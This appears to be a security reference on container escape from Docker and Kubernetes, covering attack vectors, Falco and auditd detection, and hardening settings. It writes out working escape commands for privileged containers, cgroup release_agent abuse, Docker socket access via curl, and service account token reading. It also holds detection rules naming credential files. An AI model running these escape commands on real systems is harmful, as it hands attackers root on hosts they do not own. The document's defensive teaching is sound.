Container Escape - Breaking Out of Docker/Kubernetes Containers
Container escape refers to techniques that allow an attacker to break out of a container onto the host or into other containers. Common attack vectors include: privileged containers (--privileged), carelessly mounted host directories, insecure cgroup/namespace configuration, Docker socket mounts, kernel exploits, and runc CVEs. Protection: unprivileged containers, read-only filesystems, Seccomp/AppArmor profiles, no privileged ports below 1024.
A container escape means leaving the container sandbox and reaching the host system or other containers. Containers are isolated via Linux namespaces and cgroups, but because they share the host kernel this isolation is weaker than hardware virtualization. Misconfigurations or vulnerabilities can be used to bypass it.
Container Isolation and Its Limitations
How container isolation works:
Linux containers are based on:
□ Namespaces: process, network, and filesystem isolation
□ cgroups: resource limits (CPU, memory)
□ Capabilities: granular permissions instead of root/non-root
□ Seccomp: whitelist of allowed syscalls
□ AppArmor/SELinux: Mandatory Access Control
Difference from VMs:
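VM: Hypervisor → virtualized hardware, separate guest kernel → strong isolation
Container: shared kernel with host → weaker isolation!
→ Container escape = abusing a misconfiguration or attacking the shared kernel/runtime (a VM escape requires a hypervisor bug: significantly harder)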
Docker privilege model:
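Default user in the container: root (UID 0) in the container namespace
BUT: root in the container is only distinct from root on the host if a user namespace is in use
→ With user namespace remapping (userns-remap, rootless mode): Container root → unprivileged host UID (e.g., 100000)
→ Without a user namespace (Docker's default): Container root = Host UID 0, restricted only by capabilities, Seccomp, and AppArmor/SELinux!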
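Whether container root is remapped can be read from /proc/self/uid_map inside the container. The following is a minimal Python sketch, not a definitive check: the function names are hypothetical, and the "outside" UID is relative to the parent user namespace, which is assumed here to be the host's.

```python
from pathlib import Path


def container_root_host_uid(uid_map_text: str):
    """Return the outside UID that UID 0 in this namespace maps to, or None.

    Each uid_map line has three fields: first UID inside the namespace,
    first UID outside it, and the length of the mapped range.
    """
    for line in uid_map_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        inside, outside, length = (int(field) for field in fields)
        if inside <= 0 < inside + length:
            return outside - inside
    return None


def root_is_host_root(uid_map_text: str) -> bool:
    """True when UID 0 inside the namespace is also UID 0 outside it."""
    return container_root_host_uid(uid_map_text) == 0


if __name__ == "__main__":
    uid_map = Path("/proc/self/uid_map")
    if uid_map.exists():  # only present on Linux
        print("UID 0 maps to outside UID:",
              container_root_host_uid(uid_map.read_text()))
```

A mapping line of "0 0 4294967295" means no remapping is in effect; a line such as "0 100000 65536" means container root is an unprivileged UID outside the namespace.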
Container Escape Techniques
Vector 1 - Privileged Container (--privileged):
docker run --privileged nginx
→ Container has ALL Linux capabilities
→ Can: mount new devices, use raw sockets, manipulate cgroups
Trivial escape method:
# From inside the --privileged container:
mkdir /tmp/host-mount
mount /dev/sda1 /tmp/host-mount # Mount the host hard drive (device name varies per host)!
chroot /tmp/host-mount # Host filesystem as root
# → Full host access!
Or:
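# cgroup v1 release_agent (needs CAP_SYS_ADMIN and a host that still uses cgroup v1):
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release # must be set on the child cgroup x
# $path = location of the container's root filesystem as seen from the host
echo "$path/cmd" > /tmp/cgrp/release_agent
sh -c "echo ... > /tmp/cgrp/x/cgroup.procs"
# → When the last process leaves cgroup x, the kernel runs release_agent with host privileges!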
Vector 2 - Docker Socket Mounted (/var/run/docker.sock):
Commonly seen in CI/CD pipelines:
docker run -v /var/run/docker.sock:/var/run/docker.sock image
Escape:
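# From inside the container (requires a docker CLI in the container):
docker run --rm -it -v /:/host alpine chroot /host /bin/bash
# Or, without the CLI, via the Docker Engine API:
curl -X POST --unix-socket /var/run/docker.sock \
-H 'Content-Type: application/json' \
'http://localhost/containers/create' \
-d '{"Image":"alpine","HostConfig":{"Binds":["/:/host"],"Privileged":true}}'
# → Once started (POST /containers/<id>/start): new privileged container with the host root mounted → Escape!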
Why: Access to the Docker socket = root-equivalent access to the Docker daemon!
An attacker who can reach the socket can start arbitrary containers → full host control
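From the defender's side, the same condition can be checked from inside a running container. This is a rough Python sketch with hypothetical helper names; it only tests whether the path is a Unix socket the current process may write to, and does not talk to the daemon.

```python
import os
import stat


def is_unix_socket(path: str) -> bool:
    """Return True if `path` exists and is a Unix domain socket."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return stat.S_ISSOCK(mode)


def socket_is_writable(path: str) -> bool:
    """Connecting to a Unix socket requires write permission on it."""
    return is_unix_socket(path) and os.access(path, os.W_OK)


if __name__ == "__main__":
    sock = "/var/run/docker.sock"
    if socket_is_writable(sock):
        print(sock, "is reachable: this process can control the Docker daemon")
    else:
        print(sock, "is not exposed to this process")
```

Running this as part of an image smoke test is one way to notice a socket mount that slipped into a deployment.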
Vector 3 - Sensitive Volume Mounts:
Common dangerous mounts:
-v /etc:/etc → Host /etc editable!
-v /proc:/proc → Host /proc accessible!
-v ~/.ssh:/root/.ssh → SSH keys exposed!
-v /home:/home → User home directories readable
Exploitation:
Mount /etc: → Add an entry to /etc/crontab → Host cron runs it as root → RCE on host
Mount /proc: → Write to /proc/sysrq-trigger → Kernel crash (DoS)
Mount /sys: → Writable sysfs → Manipulation of kernel and hardware settings
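The dangerous mounts listed above lend themselves to a simple pre-deployment check. The sketch below is an illustration only: the path list is an assumption assembled from this section (with /root/.ssh standing in for an expanded ~/.ssh), and the function names are hypothetical.

```python
import posixpath

# Host paths treated as sensitive; an illustrative list, not an exhaustive one.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/proc", "/sys", "/dev", "/home",
                        "/var/run/docker.sock", "/root/.ssh")


def host_path_of(volume_spec: str) -> str:
    """Extract the host side of a `host:container[:options]` bind spec."""
    return volume_spec.split(":", 1)[0]


def is_sensitive(host_path: str) -> bool:
    """True if the path equals a sensitive path or lies beneath one.

    "/" only matches exactly, otherwise every absolute path would match.
    """
    normalized = posixpath.normpath(host_path)
    for sensitive in SENSITIVE_HOST_PATHS:
        if normalized == sensitive:
            return True
        if sensitive != "/" and normalized.startswith(sensitive + "/"):
            return True
    return False


def risky_mounts(volume_specs):
    """Return the bind specs whose host side is sensitive."""
    return [spec for spec in volume_specs if is_sensitive(host_path_of(spec))]


if __name__ == "__main__":
    for spec in risky_mounts(["/etc:/etc", "/srv/app/data:/data:ro"]):
        print("dangerous mount:", spec)
```

Named volumes (for example appdata:/var/lib/app) have no absolute host path and are therefore not flagged.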
Vector 4 - Kernel and Runtime Exploits (direct attack):
Container and host share the same kernel:
→ Kernel CVE on the host → Exploit possible from inside the container!
Known CVEs (kernel and container runtime):
CVE-2022-0492 (cgroup v1 release_agent escape, Linux Kernel 5.x)
CVE-2019-5736 (runc binary overwrite, affected Docker < 18.09.2)
CVE-2019-16884 (AppArmor bypass in runc)
CVE-2020-15257 (containerd shim escape)
runc CVE-2019-5736:
→ Attacker controls a container with a specially crafted binary
→ When docker exec is run against it: runc binary on the host is overwritten (via /proc/self/exe)
→ Next runc invocation (e.g., docker run): compromised runc executes → Host RCE!
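The version boundary given above for CVE-2019-5736 (Docker < 18.09.2) can be turned into a quick inventory check. This is a minimal sketch with hypothetical function names; it compares upstream version numbers only and assumes no distribution backports, which in practice often patch older version strings.

```python
import re

# From the text: Docker releases before 18.09.2 are affected by CVE-2019-5736.
FIXED_DOCKER_VERSION = (18, 9, 2)


def parse_version(version: str):
    """Turn '18.09.1' or '18.09.1-ce' into a comparable tuple such as (18, 9, 1)."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version.strip())
    if match is None:
        raise ValueError("unrecognized version string: %r" % version)
    return tuple(int(part) for part in match.groups())


def affected_by_cve_2019_5736(docker_version: str) -> bool:
    """True if the upstream version number predates the fixed release."""
    return parse_version(docker_version) < FIXED_DOCKER_VERSION


if __name__ == "__main__":
    for version in ("18.09.1", "18.09.2", "20.10.7"):
        print(version, "affected:", affected_by_cve_2019_5736(version))
```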
Vector 5 - Capabilities Abuse:
Dangerous Capabilities (which containers sometimes have):
CAP_SYS_ADMIN: nearly equivalent to --privileged (mount, namespace, and cgroup operations)
CAP_NET_ADMIN: Manipulate network interfaces, routing, and firewall rules
CAP_SYS_PTRACE: Debug other processes (including host processes if the PID namespace is shared!)
CAP_NET_RAW: Raw sockets → ARP spoofing, sniffing
SYS_PTRACE exploit:
# Container has CAP_SYS_PTRACE:
# Host processes are visible inside the container when there is no PID namespace isolation (e.g., --pid=host)
# ptrace on host PID → inject shellcode into host process
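Which of these capabilities a process actually holds can be read from the CapEff bitmask in /proc/<pid>/status. The sketch below decodes that mask for the four capabilities named above; the bit numbers come from linux/capability.h, and the helper names are hypothetical.

```python
from pathlib import Path

# Bit positions as defined in linux/capability.h.
DANGEROUS_CAPS = {
    12: "CAP_NET_ADMIN",
    13: "CAP_NET_RAW",
    19: "CAP_SYS_PTRACE",
    21: "CAP_SYS_ADMIN",
}


def read_cap_eff(status_text: str) -> str:
    """Extract the hex CapEff value from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split()[1]
    raise ValueError("no CapEff line found")


def dangerous_caps(cap_eff_hex: str):
    """Return the names of the dangerous capabilities set in the mask."""
    mask = int(cap_eff_hex, 16)
    return [name for bit, name in sorted(DANGEROUS_CAPS.items())
            if mask & (1 << bit)]


if __name__ == "__main__":
    status = Path("/proc/self/status")
    if status.exists():  # only present on Linux
        print(dangerous_caps(read_cap_eff(status.read_text())))
```

For orientation: a mask of 00000000a80425fb, which is commonly seen with Docker's default capability set, contains CAP_NET_RAW but none of the other three.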
Vector 6 - Kubernetes Specifics:
Service Account Credentials (too broad):
cat /var/run/secrets/kubernetes.io/serviceaccount/token
→ Default service account too powerful in many K8s clusters!
→ kubectl with this token: can it list other pods, read secrets, create ClusterRoleBindings?
Over-privileged service account:
kubectl auth can-i create pods -n kube-system
→ If yes: create a Pod with hostPath: / and privileged: true → Escape!
etcd directly accessible:
→ Is etcd port 2379 reachable from the pod?
→ If etcd also accepts the connection: all Kubernetes secrets readable (stored unencrypted unless encryption at rest is configured)!
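The mounted service account token is a JWT, so its claims show which identity a compromised pod would hand to an attacker. A minimal sketch follows, assuming the standard three-segment JWT layout; the function name is hypothetical and the signature is deliberately not verified.

```python
import base64
import json
from pathlib import Path

TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"


def decode_jwt_payload(token: str) -> dict:
    """Decode the payload segment of a JWT WITHOUT verifying the signature."""
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("expected three dot-separated JWT segments")
    payload = parts[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))


if __name__ == "__main__":
    token_file = Path(TOKEN_PATH)
    if token_file.exists():  # only inside a pod with a mounted token
        claims = decode_jwt_payload(token_file.read_text())
        print("identity:", claims.get("sub"))
```

The sub claim has the form system:serviceaccount:<namespace>:<name>; what that identity may do still has to be checked with kubectl auth can-i.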
Detection Strategies
Detect container escapes:
Falco (falcosecurity/falco, open source):
→ Kernel-level syscall monitoring via eBPF (or a kernel module)
→ Detects: sensitive mounts, /proc access, syscall anomalies
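Important Falco rules (container_started, container, open_read, and open_write are macros from Falco's default ruleset):
- rule: Container started in privileged mode
  desc: A container was started with --privileged
  condition: container_started and container and container.privileged=true
  output: Privileged container started (container=%container.name image=%container.image.repository)
  priority: WARNING
- rule: Access to sensitive files in the container
  desc: A process in a container read a credential file
  condition: >
    open_read and container and
    fd.name in (/etc/shadow, /etc/passwd, /root/.ssh/id_rsa)
  output: Sensitive file read in container (file=%fd.name container=%container.name)
  priority: CRITICAL
- rule: Docker socket access in the container
  desc: A process in a container opened the Docker socket for writing
  condition: >
    open_write and container and
    fd.name=/var/run/docker.sock
  output: Docker socket accessed from container (proc=%proc.name container=%container.name)
  priority: CRITICAL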
System audit (auditd):
-w /var/run/docker.sock -p rw -k docker-socket
-w /proc/sysrq-trigger -p w -k kernel-trigger
→ Log on write access to Docker socket / sysrq-trigger
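Events recorded by these watches carry the -k key, which makes them easy to pick out of audit.log. The sketch below counts tagged SYSCALL records per key and command; the function names are hypothetical and it assumes the usual key="..." and comm="..." fields of the raw log format.

```python
import re
from collections import Counter

KEY_RE = re.compile(r'\bkey="([^"]+)"')
COMM_RE = re.compile(r'\bcomm="([^"]+)"')

# Keys defined by the two audit watches above.
WATCHED_KEYS = {"docker-socket", "kernel-trigger"}


def matching_events(log_lines):
    """Yield (key, comm) for SYSCALL records tagged with a watched key."""
    for line in log_lines:
        if not line.startswith("type=SYSCALL"):
            continue
        key = KEY_RE.search(line)
        if key is None or key.group(1) not in WATCHED_KEYS:
            continue
        comm = COMM_RE.search(line)
        command = comm.group(1) if comm else "?"
        yield key.group(1), command


def summarize(log_lines):
    """Count matching events per (key, command) pair."""
    return Counter(matching_events(log_lines))


if __name__ == "__main__":
    try:
        with open("/var/log/audit/audit.log") as log:
            for (key, comm), count in summarize(log).items():
                print(key, comm, count)
    except OSError:
        print("audit log not readable from this process")
```

In practice ausearch -k docker-socket gives the same selection; the script form is mainly useful when the log is shipped elsewhere for analysis.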
Kubernetes Audit Logging:
→ Pod creation with hostPath / privileged=true → Alert!
→ Service account from an application (non-system) namespace bound to cluster-admin → Alert!
→ kubectl exec on privileged pods → Alert!
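The first alert can be prototyped directly against audit events. This is a sketch under assumptions: it expects events logged at the Request level or above (otherwise requestObject is absent), and the function names are hypothetical.

```python
def escape_risk_findings(pod: dict) -> list:
    """List escape-relevant settings found in a Pod manifest (as a dict)."""
    spec = pod.get("spec") or {}
    findings = []
    if spec.get("hostPID"):
        findings.append("hostPID")
    for volume in spec.get("volumes") or []:
        host_path = volume.get("hostPath")
        if host_path:
            findings.append("hostPath:" + str(host_path.get("path")))
    containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
    for container in containers:
        context = container.get("securityContext") or {}
        if context.get("privileged"):
            findings.append("privileged:" + str(container.get("name")))
    return findings


def findings_from_audit_event(event: dict) -> list:
    """Inspect a Kubernetes audit event; only pod creation is considered."""
    ref = event.get("objectRef") or {}
    is_pod_create = (event.get("verb") == "create"
                     and ref.get("resource") == "pods"
                     and not ref.get("subresource"))
    if not is_pod_create:
        return []
    return escape_risk_findings(event.get("requestObject") or {})


if __name__ == "__main__":
    example = {
        "verb": "create",
        "objectRef": {"resource": "pods", "namespace": "kube-system"},
        "requestObject": {"spec": {
            "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
            "containers": [{"name": "shell",
                            "securityContext": {"privileged": True}}],
        }},
    }
    print(findings_from_audit_event(example))
```

Any non-empty result is a candidate for an alert; whether it is legitimate (for example a node agent) has to be decided per namespace.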
Mitigation Measures
Container Hardening:
1. No privileged containers (--privileged prohibited!):
docker run --security-opt no-new-privileges nginx
→ No privilege escalation in the container
Kubernetes:
securityContext:
  allowPrivilegeEscalation: false
  privileged: false
  capabilities:
    drop: ["ALL"] # Remove all capabilities!
2. Read-Only Root Filesystem:
docker run --read-only nginx
Kubernetes:
securityContext:
  readOnlyRootFilesystem: true
→ Malware cannot write executables to the root filesystem (writable volumes and tmpfs mounts remain)!
3. Do not run as root:
Dockerfile: USER 1000
Kubernetes:
securityContext:
  runAsNonRoot: true
  runAsUser: 1000
4. Seccomp profiles (system call filtering):
docker run --security-opt seccomp=profile.json nginx
Kubernetes:
securityContext:
  seccompProfile:
    type: RuntimeDefault
→ Only allowed syscalls → Reduced kernel attack surface
5. AppArmor profiles:
docker run --security-opt apparmor=docker-default nginx
→ MAC rules in addition to capabilities
6. No dangerous volume mounts:
□ No /var/run/docker.sock
□ No /proc, /sys, /dev
□ No /, /etc, /home
□ hostPath: avoid if possible; if necessary: readOnly: true
7. Kubernetes-specific:
□ Pod Security Admission (PSA): enforce Restricted profile
□ Network Policies: Pods may only communicate with the peers they actually need
□ Service Account: separate SA per deployment, minimal permissions
□ automountServiceAccountToken: false if not necessary
□ etcd: accessible only via API server, no direct pod access
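The container-level settings from items 1 to 4 can be checked mechanically before a manifest is applied. The following is a minimal sketch, not a replacement for Pod Security Admission: the function name is hypothetical, and it only looks at the container's own securityContext, so values inherited from the pod-level securityContext are reported as missing.

```python
def hardening_gaps(container: dict) -> list:
    """Return the hardening settings missing from one container spec."""
    context = container.get("securityContext") or {}
    gaps = []
    if context.get("privileged", False):
        gaps.append("privileged must be false")
    # Unset is treated as a gap: escalation is only blocked when set to false.
    if context.get("allowPrivilegeEscalation", True):
        gaps.append("allowPrivilegeEscalation must be false")
    if not context.get("readOnlyRootFilesystem", False):
        gaps.append("readOnlyRootFilesystem should be true")
    if not context.get("runAsNonRoot", False):
        gaps.append("runAsNonRoot should be true")
    dropped = (context.get("capabilities") or {}).get("drop") or []
    if "ALL" not in dropped:
        gaps.append("capabilities.drop should include ALL")
    profile = (context.get("seccompProfile") or {}).get("type")
    if profile not in ("RuntimeDefault", "Localhost"):
        gaps.append("seccompProfile.type should be RuntimeDefault or Localhost")
    return gaps


if __name__ == "__main__":
    hardened = {
        "name": "web",
        "securityContext": {
            "privileged": False,
            "allowPrivilegeEscalation": False,
            "readOnlyRootFilesystem": True,
            "runAsNonRoot": True,
            "runAsUser": 1000,
            "capabilities": {"drop": ["ALL"]},
            "seccompProfile": {"type": "RuntimeDefault"},
        },
    }
    print(hardening_gaps(hardened))         # no gaps expected
    print(hardening_gaps({"name": "web"}))  # every default is flagged
```

A check like this fits into CI as an early warning; enforcement in the cluster remains the job of the Restricted Pod Security profile.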